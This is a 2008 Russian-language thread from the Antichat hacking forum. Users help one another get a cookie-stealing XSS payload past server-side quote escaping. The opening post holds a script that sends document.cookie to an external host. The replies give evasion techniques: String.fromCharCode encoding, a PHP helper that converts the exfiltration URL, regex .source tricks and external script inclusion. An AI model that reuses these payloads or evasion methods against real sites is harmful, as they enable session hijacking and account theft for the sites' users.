Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Xss и экранирование (https://forum.antichat.xyz/showthread.php?t=77215)

Ponchik 15.07.2008 14:48
Xss и экранирование
 
Кидаю в болталку, т.к. тема примитивная ИМХО :rolleyes:
Ну в общем на серваке экранирование и жаваскрипт типа
Код:
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
превратится в
Код:
<script>img = new Image(); img.src = \"http://old.antichat.ru/cgi-bin/s.jpg?\"+document.cookie;</script>
и работать небудет, чё делать? :rolleyes:
Те кто знают JS спокойно решают эту проблему, а я без понятия, гуглил, ничё не нащёл...

Chaak 15.07.2008 15:11
Закодируй в чаркоды

Ponchik 15.07.2008 15:12
Чёто как-то нет такой функции как я понял из ошибки жаваскрипта...
Но ход мысли я понял... Хмм... Ану щас попробую ord()+ord()+... моджет получится :)
Да в нём и функции ord штоле нету.... :mad:

Короче пойду я втыкать это хреново шифрование, спасибо

Погуглив догнал, вот сбацал скрипт, может кому надо будет
PHP код:
<?php
$s 'http://old.antichat.ru/cgi-bin/s.jpg?';
$ord = array();
for($i=0;$i<strlen($s);$i++) {
    $ord[] = ord($s[$i]);
}
$ord implode(',',$ord);
echo "String.fromCharCode($ord)";
?>

astrologer 15.07.2008 15:25
/строка/.source;
/строка/.toString().slice(1, -1);

P.S.
<script src=http://whatever></script>

mr.The 15.07.2008 18:30
инклуд юзай.
и вообще на вот почитай: _http://ha.ckers.org/xss.html


Время: 07:04